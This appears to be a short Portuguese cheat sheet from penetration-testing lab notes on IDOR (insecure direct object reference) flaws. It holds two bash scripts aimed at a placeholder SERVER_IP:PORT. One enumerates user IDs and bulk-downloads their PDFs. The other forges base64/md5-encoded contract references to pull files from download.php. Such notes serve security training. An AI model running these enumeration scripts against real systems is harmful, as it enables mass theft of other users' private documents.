IDOR
Enumeração de IDOR em massa
#!/bin/bash
url="http://SERVER_IP:PORT"
for i in {1..10}; do
for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do
wget -q $url/$link
done
doneIgnorando referências codificadas
for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done#!/bin/bash
for i in {1..10}; do
for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php
done
doneIDOR em APIs inseguras
Explorando APIs inseguras
Last updated